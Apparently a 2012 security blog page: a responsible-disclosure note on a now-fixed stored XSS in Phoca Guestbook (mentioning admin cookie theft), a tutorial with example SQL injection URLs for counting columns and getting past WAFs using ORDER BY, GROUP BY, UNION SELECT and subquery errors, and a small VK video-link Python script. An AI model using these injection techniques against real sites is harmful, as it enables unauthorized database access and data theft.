Wednesday, November 28, 2012

Phoca Guestbook XSS

Found XSS and possibly a permanent and blind XSS.
Reported to the right person and they came out with an updated version to fix that issue.

Get the updated version here

Step to produce the bug :
Complete the message/comment box. Each forms are vulnerable to XSS.


XSS payload is successfully stored. If the comment/message need a validation from admin, we can use direct payload to get the admin cookies which this attack known as Blind XSS.

Date reported : 25/10/2012
Date fixed       : 21/11/2012
Date published: 29/11/2012

Thanks,
@yappare



Friday, November 23, 2012

Tuesday, November 20, 2012

Counting Columns in SQLi

Hi there.
As we already know,the most common way to count number of columns in SQL Injection attack is via order by query.
Example as below

http://example.org/news.php?id=8 order by 5--
If the page load normally, this shows that the number of column is still in the range of 5.

http://example.org/news.php?id=8 order by 6--
Else,if the number of column already exceed its range,an error will appear and usually it'll look like
Unknown column '6' in 'order clause'
From here we know that the number of column exist is 5 and can proceed with SQLi.

http://example.org/news.php?id=-8 union select 1,2,3,4,5--
And so on.

But,if you encounter a scenario where you cant use order by because of the WAF or any reason related,there are still some ways to count it.

1 - Use group by query

Similar to order by  technique.but instead using order by, we use GROUP BY

http://example.org/news.php?id=8 group by 5--
If the page load normally, this shows that the number of column is still in the range of 5.

http://example.org/news.php?id=8 group by 6--
Else,if the number of column already exceed its range,an error will appear and usually it'll look like
Unknown column '6' in 'group statement'

another way is using

2 - Set the condition such as ( the main query ) = (select 1)
As example,

http://example.org/news.php?id=8 and (select * from news)=(select 1)
where we can see we try to count the number of column (using * ) from the table available (news)..
and the error message will shows the number of column such as this message
Operand should contain 5 column(s)

Thanks,
@yappare a.k.a p0pc0rn

Monday, November 19, 2012

VKDownloader V2

Remember the 1st vkdownloader python script? Look at here http://c0rni3sm.blogspot.com/2012/01/vkdownloader-python-script.html
..quite messy. I'm not good in programming actually.still learning from basic..the old version wont work anymore,a little modification is needed and here I share with you all the 2nd version of VKDownloader.
How to use? Just like the old one :)


1 - need a python in your PC
2 - copy the video code
3 - run it using command python vkdownloader_v2.py "url code"



#!/usr/bin/python

import sys, re, urllib2


if len(sys.argv) < 2:
    print """    
## Usage : python vkdownloader_v2.py "Url" ##
-------------------------------------------------------------------------------------------
Example :
python vkdownloader_v2.py "http://vk.com/video_ext.php?oid=1111111&id=2222222&hash=4333333" 
-------------------------------------------------------------------------------------------
## VK Downloader V2 by p0pc0rn 2012 ##

          
    
          """
    sys.exit(0)

url = sys.argv[1]
url2 = sys.argv[1]
url3 = sys.argv[1]

find = re.compile("var video_host = '(.*?)';")
find2 = re.compile("var video_uid = '(.*?)';")
find3 = re.compile("var video_vtag = '(.*?)';")
data = urllib2.urlopen(url).read()
data2 = urllib2.urlopen(url2).read()
data3 = urllib2.urlopen(url3).read()
result = find.search(data)
str = result.group(1)
data2 = urllib2.urlopen(url2).read()
data3 = urllib2.urlopen(url3).read()
result2 = find2.search(data2)
result3 = find3.search(data3)

print 'Download link for 360p => ' + str.replace("userapi.com", "vk.com") +'u'+result2.group(1)+'/videos/'+ result3.group(1)+'.360.mp4'
print 'Download link for 360p => ' + str.replace("userapi.com", "vk.com") +'u'+result2.group(1)+'/videos/'+ result3.group(1)+'.480.mp4'
print 'Download link for 360p => ' + str.replace("userapi.com", "vk.com") +'u'+result2.group(1)+'/videos/'+ result3.group(1)+'.720.mp4'



or simply get it here http://pastebin.com/K3ht0Bc7

Friday, November 9, 2012